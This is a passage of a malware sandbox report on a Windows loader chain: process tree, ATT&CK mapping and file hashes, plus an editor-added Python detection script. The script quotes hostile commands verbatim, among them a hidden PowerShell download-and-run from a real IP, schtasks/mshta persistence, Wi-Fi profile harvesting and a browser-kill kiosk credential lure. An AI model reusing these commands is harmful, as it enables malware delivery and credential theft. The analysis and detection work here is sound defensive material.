C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:4168
-
-
-
C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe"C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:636 -
C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe"C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1716
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 636 -s 8127⤵
- Program crash
PID:2488
-
-
-
C:\Users\Admin\AppData\Local\Temp\10108730101\49309c0b92.exe"C:\Users\Admin\AppData\Local\Temp\10108730101\49309c0b92.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:684 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:2392
-
-
-
C:\Users\Admin\AppData\Local\Temp\10108740101\1f3ecc566c.exe"C:\Users\Admin\AppData\Local\Temp\10108740101\1f3ecc566c.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5008
-
-
C:\Users\Admin\AppData\Local\Temp\10108750101\a53c2ef5e2.exe"C:\Users\Admin\AppData\Local\Temp\10108750101\a53c2ef5e2.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4288 -
C:\Users\Admin\AppData\Local\Temp\88J2R05CLKFFTOLX.exe"C:\Users\Admin\AppData\Local\Temp\88J2R05CLKFFTOLX.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1536
-
-
-
C:\Users\Admin\AppData\Local\Temp\10108760101\3a82a50014.exe"C:\Users\Admin\AppData\Local\Temp\10108760101\3a82a50014.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1120
-
-
C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe"C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3464 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4156
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4408
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4824
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3832
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4072
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:4844
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:516 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2000 -parentBuildID 20240401114208 -prefsHandle 1928 -prefMapHandle 1920 -prefsLen 27368 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1ce29bd-a2c1-456e-834c-16e7269aea66} 516 "\\.\pipe\gecko-crash-server-pipe.516" gpu9⤵PID:2132
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2436 -parentBuildID 20240401114208 -prefsHandle 2428 -prefMapHandle 2416 -prefsLen 28288 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {29b4fb96-3fad-4f8d-825b-c9ea27b67642} 516 "\\.\pipe\gecko-crash-server-pipe.516" socket9⤵PID:1356
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3224 -childID 1 -isForBrowser -prefsHandle 3240 -prefMapHandle 3236 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {48d81acd-b0ac-488c-9bd1-6850e7e56064} 516 "\\.\pipe\gecko-crash-server-pipe.516" tab9⤵PID:2804
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3980 -childID 2 -isForBrowser -prefsHandle 3996 -prefMapHandle 2688 -prefsLen 32778 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b0a590be-7e65-47bb-9696-7822e28e5ab3} 516 "\\.\pipe\gecko-crash-server-pipe.516" tab9⤵PID:1256
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4896 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4900 -prefMapHandle 4816 -prefsLen 32778 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a9282c8f-b678-4fb1-aa67-3efc0a53833e} 516 "\\.\pipe\gecko-crash-server-pipe.516" utility9⤵
- Checks processor information in registry
PID:5152
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5232 -childID 3 -isForBrowser -prefsHandle 5224 -prefMapHandle 4112 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f096e554-6c1f-47a8-98ef-03b0431cc8eb} 516 "\\.\pipe\gecko-crash-server-pipe.516" tab9⤵PID:5532
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5356 -childID 4 -isForBrowser -prefsHandle 5364 -prefMapHandle 5368 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f5fe5da7-af72-4a22-af82-e6dd375f31b9} 516 "\\.\pipe\gecko-crash-server-pipe.516" tab9⤵PID:5548
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5588 -childID 5 -isForBrowser -prefsHandle 5664 -prefMapHandle 5660 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {01a0b816-5676-4415-a553-ece2a9d8eabd} 516 "\\.\pipe\gecko-crash-server-pipe.516" tab9⤵PID:5564
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe"C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5848
-
-
C:\Users\Admin\AppData\Local\Temp\10108790101\2asf3YX.exe"C:\Users\Admin\AppData\Local\Temp\10108790101\2asf3YX.exe"6⤵
- Executes dropped EXE
PID:1424
-
-
C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe"C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5288 -
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5440
-
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2848 -ip 28481⤵PID:4196
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 636 -ip 6361⤵PID:4588
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4324
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3780
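The process tree above is worth encoding as detection logic rather than reading once. The chain it shows: schtasks registers a task that runs mshta on a .hta in a user-writable directory every 25 minutes; the .hta spawns a hidden-window PowerShell that fetches random.exe with WebClient.DownloadFile and starts it; Build.exe harvests Wi-Fi profiles through netsh; 68a19ce725.exe kills every common browser with taskkill and relaunches Firefox in --kiosk mode on a URL that embeds a Google sign-in page; and 561b99cbf5.exe, flagged for SetThreadContext, spawns C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, which then downloads a PE. Note also that the first two PowerShell stages build the drop path as $env:temp+'NAME.EXE' with no separator, so the payload lands directly under AppData\Local as TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE, a file-name artifact a hunt can key on. The Python below is an added example written by the editor, not code from the report or the sandbox: the EVENTS list is constructed from PIDs, image paths, command lines and behaviour tags copied from the tree (a subset, with the report's PIDs), and the rules, their names and the ATT&CK IDs in the docstrings are the editor's own.

```python
"""Detection logic for the loader chain in the process tree above.

Added example, not part of the sandbox report. EVENTS is a constructed set of
records: PIDs, image paths, command lines and behaviour tags are copied from
the report; the rule logic is the editor's own and runs offline on those records.
"""
import re

EVENTS = [  # constructed from the report's process tree (subset; PIDs as reported)
    {"pid": 764, "ppid": 4712, "image": r"C:\Windows\SysWOW64\cmd.exe", "tags": [],
     "cmd": r'C:\Windows\system32\cmd.exe /c schtasks /create /tn OdMxkmaweBS /tr "mshta C:\Users\Admin\AppData\Local\Temp\zbIoMqsNd.hta" /sc minute /mo 25 /ru "Admin" /f'},
    {"pid": 1728, "ppid": 764, "image": r"C:\Windows\SysWOW64\schtasks.exe", "tags": ["Scheduled Task/Job: Scheduled Task"],
     "cmd": r'schtasks /create /tn OdMxkmaweBS /tr "mshta C:\Users\Admin\AppData\Local\Temp\zbIoMqsNd.hta" /sc minute /mo 25 /ru "Admin" /f'},
    {"pid": 2896, "ppid": 1756, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", "tags": ["Downloads MZ/PE file"],
     "cmd": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;'''},
    {"pid": 2804, "ppid": 3152, "image": r"C:\Windows\SysWOW64\netsh.exe", "tags": [], "cmd": "netsh wlan show profile"},
    {"pid": 4156, "ppid": 3464, "image": r"C:\Windows\SysWOW64\taskkill.exe", "tags": [], "cmd": "taskkill /F /IM firefox.exe /T"},
    {"pid": 4844, "ppid": 3464, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "tags": [],
     "cmd": r'"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking'},
    {"pid": 4904, "ppid": 796, "image": r"C:\Users\Admin\AppData\Local\Temp\10108710101\561b99cbf5.exe",
     "tags": ["Suspicious use of SetThreadContext"], "cmd": r'"C:\Users\Admin\AppData\Local\Temp\10108710101\561b99cbf5.exe"'},
    {"pid": 4168, "ppid": 4904, "image": r"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe",
     "tags": ["Downloads MZ/PE file"], "cmd": r'"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"'},
]

USER_WRITABLE = re.compile(r"(?i)(\\AppData\\Local\\Temp\\|^C:\\Temp\\|\\Users\\Public\\)")
URL = re.compile(r"""https?://[^\s'"]+""")
BROWSERS = ("firefox.exe", "chrome.exe", "msedge.exe", "opera.exe", "brave.exe")


def rule_schtasks_mshta(ev):
    """schtasks /create whose action runs mshta on a .hta in a user-writable dir (T1053.005); returns the path."""
    if not ev["image"].lower().endswith("schtasks.exe"):
        return None
    # Handles both forms in the report: /tr "mshta C:\...\x.hta" and /tr "mshta \"C:\Temp\x.hta\""
    m = re.search(r'(?i)/create.*?/tr\s+"mshta\s+(?:\\")?([A-Za-z]:\\.*?\.hta)', ev["cmd"])
    return m.group(1) if m and USER_WRITABLE.search(m.group(1)) else None


def rule_ps_downloader(ev):
    """Hidden-window PowerShell that fetches with WebClient and runs the result (T1059.001); returns the URL."""
    cmd = ev["cmd"]
    if "powershell" not in ev["image"].lower() or "start-process" not in cmd.lower():
        return None
    if re.search(r"(?i)-w(?:indowstyle)?\s+hidden", cmd) and re.search(r"(?i)\.Download(File|String)\(", cmd):
        urls = URL.findall(cmd)
        return urls[0] if urls else "<no url parsed>"
    return None


def rule_wifi_harvest(ev):
    """netsh wlan show profile|networks: Wi-Fi profile and SSID collection (T1016.002)."""
    if not ev["image"].lower().endswith("netsh.exe"):
        return None
    m = re.search(r"(?i)wlan\s+(show\s+(?:profiles?|networks))", ev["cmd"])
    return m.group(1).lower() if m else None


def rule_browser_kill_kiosk(events):
    """Same parent kills browsers with taskkill, then launches one in --kiosk mode on a sign-in
    page: a credential-harvesting lure. Returns (ppid, pid, lure_url) per kiosk launch."""
    kill_re = re.compile(r"(?i)/IM\s+(%s)" % "|".join(re.escape(b) for b in BROWSERS))
    by_parent = {}
    for ev in events:
        by_parent.setdefault(ev["ppid"], []).append(ev)
    hits = []
    for ppid, kids in by_parent.items():
        killed = any(k["image"].lower().endswith("taskkill.exe") and kill_re.search(k["cmd"]) for k in kids)
        for k in kids:
            if killed and "--kiosk" in k["cmd"].lower():
                urls = URL.findall(k["cmd"])
                # The lure nests a second URL in the first one's query string; report the inner one.
                inner = re.search(r"https?://.*?(https?://\S+)", urls[0]) if urls else None
                hits.append((ppid, k["pid"], inner.group(1) if inner else (urls[0] if urls else "")))
    return hits


def rule_lolbin_after_setthreadcontext(events):
    """Temp-resident parent that used SetThreadContext spawns a binary under C:\\Windows which then
    downloads a PE: consistent with hollowing a trusted host process (T1055.012)."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for ev in events:
        parent = by_pid.get(ev["ppid"])
        if (parent and "Suspicious use of SetThreadContext" in parent["tags"]
                and USER_WRITABLE.search(parent["image"])
                and ev["image"].lower().startswith("c:\\windows\\")
                and "Downloads MZ/PE file" in ev["tags"]):
            hits.append((parent["pid"], ev["pid"], ev["image"]))
    return hits


def scan(events):
    """Run every rule; returns (rule, pid, detail) findings in a stable order."""
    per_event = [("schtasks->mshta persistence", rule_schtasks_mshta),
                 ("hidden powershell downloader", rule_ps_downloader),
                 ("wifi profile harvest", rule_wifi_harvest)]
    findings = []
    for ev in events:
        for name, rule in per_event:
            detail = rule(ev)
            if detail:
                findings.append((name, ev["pid"], detail))
    findings += [("browser kill + kiosk lure", pid, lure) for _, pid, lure in rule_browser_kill_kiosk(events)]
    findings += [("lolbin child after SetThreadContext", pid, img) for _, pid, img in rule_lolbin_after_setthreadcontext(events)]
    return findings


if __name__ == "__main__":
    for f in scan(EVENTS):
        print("%-38s pid=%-5d %s" % f)
```

Run directly it prints five findings, one per behaviour listed above. The same rules port to process-creation telemetry (Sysmon Event ID 1 supplies image, parent PID and command line); the schtasks rule fires on schtasks.exe itself rather than the cmd.exe wrapper so one task does not produce two alerts, and the kiosk and hollowing rules need the parent/child pairing, which is why they take the whole event list.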
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter (1)
  PowerShell (1)
Scheduled Task/Job (1)
  Scheduled Task (1)
Persistence
Boot or Logon Autostart Execution (1)
  Registry Run Keys / Startup Folder (1)
Create or Modify System Process (4)
  Windows Service (4)
Event Triggered Execution (1)
  Netsh Helper DLL (1)
Scheduled Task/Job (1)
  Scheduled Task (1)
Privilege Escalation
Boot or Logon Autostart Execution (1)
  Registry Run Keys / Startup Folder (1)
Create or Modify System Process (4)
  Windows Service (4)
Event Triggered Execution (1)
  Netsh Helper DLL (1)
Scheduled Task/Job (1)
  Scheduled Task (1)
Defense Evasion
Impair Defenses (5)
  Disable or Modify Tools (5)
Modify Registry (6)
Virtualization/Sandbox Evasion (2)
Credential Access
Credentials from Password Stores (1)
  Credentials from Web Browsers (1)
Unsecured Credentials (3)
  Credentials In Files (3)
Downloads
-
Filesize
160KB
MD5f310cf1ff562ae14449e0167a3e1fe46
SHA185c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA5121196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad
-
Filesize
40KB
MD5a182561a527f929489bf4b8f74f65cd7
SHA18cd6866594759711ea1836e86a5b7ca64ee8911f
SHA25642aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA5129bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558
-
Filesize
779B
MD539c8cd50176057af3728802964f92d49
SHA168fc10a10997d7ad00142fc0de393fe3500c8017
SHA256f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6
-
Filesize
1KB
MD534ec6630c13fce07b99f51f698e0a0d8
SHA12898616d80ff646c0dbdf297e31f65ee45265868
SHA256f6bab8ba5d4dbae063dc40ccbf03df5dfa3863b5ccf40836db6b2d1ca4bc3794
SHA512eb063acec578ccb9b56a25c0c6834c79bf9ed4ca2fd7d4b147107983f9ade1cd3a486a12c429d7d7bc5042b986132e4aa915f3efaf1249e89460b6bcbf2f7255
-
Filesize
2KB
MD525604a2821749d30ca35877a7669dff9
SHA149c624275363c7b6768452db6868f8100aa967be
SHA2567f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5
-
Filesize
987KB
MD5f49d1aaae28b92052e997480c504aa3b
SHA1a422f6403847405cee6068f3394bb151d8591fb5
SHA25681e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA51241f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
Filesize
16KB
MD5b75b85bfad2d06f1ccf71cc19dfba27e
SHA1b4af2261046804c10c10ede54fb2ce73a303cce4
SHA256d69e5a13607b1332ecc9a1ca45841370cc101cba3a02c17d127fd9775c6078e3
SHA51263960e5a4542ae5a598882f077e81ac87a624388bdf55b49995c4ceaad172b0b4cb3fdd524548f04f063e972732d0bd7939ce33df0b2c18302290bbd7470db16
-
Filesize
16KB
MD5ec0fb17cd7bda2d278fd3af69aa08681
SHA11d75c9efb572d18942b0f7ba9ff73f3075e8f80c
SHA25684e8ac44424376fda44fa15fc49b68ae8bb1346ae5fb6961ba85c72c0d00c5c1
SHA51286b4aeef07f5dc8f3095fadca8532c78ec527deb5d2b4f9debf8e9bb2dfa66a12336d5a650c704e44536421457bd04939c9912a1bc6a0fc497cd8148ebc6650c
-
Filesize
16KB
MD58586e006be6bdb10ca33901f828a7893
SHA13576ed33e2ba06447f0c7df2fe7884b778e72440
SHA2566cff4149a7e299ff68a30b0e7c062878d4c265eac57a5a1843741f0648641173
SHA512e7f759368a251047d93f81b999c5e85bbd33e8ce41207ecff6fe07df5a5a75f6559690bb6bac1e3b2c6571b2db4343971f83c281f2bfa63f68a5f86ec3f8d623
-
Filesize
16KB
MD5c4d64e33c4e1119e9f9685147ff235af
SHA121af258889f1ae59c920793bbee0252465ffd1fe
SHA25621f554c4fd474c2517e6c1bc726a6ea121e9211d155fc07274431bbbc3a9d86f
SHA512fc6f4d762aec512834fcbb5eeae8af8131b7409b8a63486b18cc43f66bcd165eec5aab8b4b46b9cf542cdfacd4090ff4bd0b3fe1099558991d4c93c69f19fc10
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\8wi25oev.default-release\activity-stream.discovery_stream.json
Filesize21KB
MD5b123bf10021f8147dbde2433cba241b1
SHA1c62d1ebd67bb9c5439e87d485b9953b8a47d7db3
SHA256bcd923205ef8acab76e7fc16206f6510ff968aaff72f84594f6a2c939f90b4c2
SHA512cee14bdc1e397a0c4129449d9ae420dce398f532a53fae5010280c23e05e9d5254823dd7daf2782158bf7a701a94de7ca31646bd834f06f81f2329e29d2c48a8
-
Filesize
1.8MB
MD51565063ca3d43812789fbf960418659e
SHA1d710ecdf1861e25498d1886f8c2a44f31826fd55
SHA256c5b7480a6d02c38a408981322c52ad0d6efbdc0a0d6508d788d3575c561cc978
SHA512eb044ea8ecdfed744685623fd3bf16dc0221900b405eff580d93de62073e31b93b23b69e81fea1a2bff6deac793cee038587d127fb3ddcca1359f3380f7cca42
-
Filesize
1.8MB
MD593da4bdbae52d91d32a34c140466e8cf
SHA12177f234160ef77058d2237a8f97c1d663647240
SHA256878228e580cd27a72a847922f9b16b7d16d0797c68aa9e6642ae3da13518de7a
SHA51214d14d6d8d436953ed43483b8b3ba30a4f1df73eb2eca055c047bb0b7e328150ae0c49122a657f5f8ab752872e5d40b791e793675110df5c90440077f446b91a
-
Filesize
779KB
MD5ff130f0907781b9b0564a2e34350bda9
SHA1968fd9f8787bda595df9a1670d28e8b129bbea99
SHA256820ab89ef3e39e2ec7f7322c4710a7fbb1cc01b5cc28043f607f30312119a1b5
SHA5128e5feb41fcfdf2366c8da4fda8d37eb29defb839689cacfdaf50d03604447e18e9cf83f31d90f7f48fce0ad40add335cf85b0c3b135de396e5971c19fd239e1f
-
Filesize
938KB
MD507164c5597a4fbd5cf8c5ebcc43fcbd3
SHA1d8ffc868f9a36ab2323440bc0a263e2e3e52def3
SHA2562ea53f7442f44cfc2ea88f2b52d6841ec009d4789f67fd002530e4dece4235d3
SHA51287d4f793aee02e5e484588913034caddfab25381a959815c57d0ec2979539c641a25cabe43c917659cc912d851c5d7d7dc64f02a01e541b554b3eedc8e0477d9
-
Filesize
1KB
MD5cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1b0db8b540841091f32a91fd8b7abcd81d9632802
SHA2565e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5
-
Filesize
506KB
MD519d2fe8a5d6c2174fb2a5c54e98523e0
SHA18e0a2cf8cbff8c169cba1e0a3785083ebeb5a627
SHA2568a12b05f92dbb47d713dbc73cccccb089fc88f6ba96b5a64f42aaf6431e5616e
SHA5123ff858f79a4e55f6728369b0f0d6de6060dbc4728ab21e5c352c209ef92b203f3039a623118706227ac61f75ab8b68ae4958d7939a000729de0890b54706ca95
-
Filesize
3.7MB
MD5aa512b143958cbbe85c4fb41bb9ba3fa
SHA146459666d53ecb974385698aa8c306e49c1110ab